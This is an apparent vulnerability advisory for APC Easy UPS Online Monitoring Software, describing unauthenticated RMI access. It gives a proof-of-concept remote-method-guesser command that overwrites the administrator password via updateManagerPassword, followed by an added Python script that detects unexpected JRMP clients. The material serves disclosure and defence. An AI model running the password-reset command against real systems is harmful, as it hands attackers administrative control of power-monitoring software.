A vulnerability in Schneider Electric APC Easy UPS Online Monitoring Software V2.5-GS-01-22320 allows an unauthenticated remote attacker to issue RMI calls to certain remote Java objects in the application.

For example, the attacker can invoke cn.com.voltronicpower.rmiclass.SystemService.updateManagerPassword() to change the administrator password for the monitoring software.

POC:

- Install remote-method-guesser (
- Run: java -jar rmg-4.3.1-jar-with-dependencies.jar call  41009 '"482c811da5d5b4bc6d497ffa98491e38"' --signature 'String updateManagerPassword(String managerPassword)' --bound-name system
- This command attempts to change the application's Administrator password to "password123" (without quotes)
- To reset to a different password, replace 482c811da5d5b4bc6d497ffa98491e38 with the MD5 hash hex string of a given password
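
For detection, the following added example (not part of the original advisory or of any vendor tooling) flags hosts that open a Java RMI (JRMP) session to port 41009, the port used in the command above, from outside an expected management subnet. The flow-record shape, the sample flows and the `10.0.5.0/24` allowlist are constructed assumptions.

```python
import ipaddress
import struct

RMI_PORT = 41009       # port used in the PoC command on this page
JRMP_MAGIC = b"JRMI"   # first four bytes a client sends on an RMI connection
PROTOCOLS = {0x4B: "Stream", 0x4C: "SingleOp", 0x4D: "Multiplex"}


def parse_jrmp_header(payload):
    """Return (version, protocol_name) if payload starts a JRMP session, else None."""
    if len(payload) < 7 or payload[:4] != JRMP_MAGIC:
        return None
    version, proto = struct.unpack(">HB", payload[4:7])
    name = PROTOCOLS.get(proto)
    return (version, name) if name else None


def unexpected_rmi_clients(flows, allowed_nets):
    """Flag sources outside allowed_nets that opened a JRMP session to RMI_PORT."""
    nets = [ipaddress.ip_network(n) for n in allowed_nets]
    hits = []
    for src, dst_port, first_bytes in flows:
        if dst_port != RMI_PORT or parse_jrmp_header(first_bytes) is None:
            continue
        addr = ipaddress.ip_address(src)
        if not any(addr in n for n in nets):
            hits.append(src)
    return hits


# Constructed sample flows: (source IP, destination port, first client bytes)
SAMPLE_FLOWS = [
    ("10.0.5.20", 41009, bytes.fromhex("4a524d4900024b")),    # JRMP, admin subnet
    ("203.0.113.7", 41009, bytes.fromhex("4a524d4900024b")),  # JRMP, outside
    ("203.0.113.9", 41009, b"GET / HTTP/1.1\r\n"),            # not JRMP
    ("198.51.100.4", 443, bytes.fromhex("4a524d4900024b")),   # different port
    ("192.0.2.33", 41009, bytes.fromhex("4a524d49")),         # truncated header
]

if __name__ == "__main__":
    # Assumed allowlist: only the management subnet should speak RMI to the service
    print(unexpected_rmi_clients(SAMPLE_FLOWS, ["10.0.5.0/24"]))
```
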

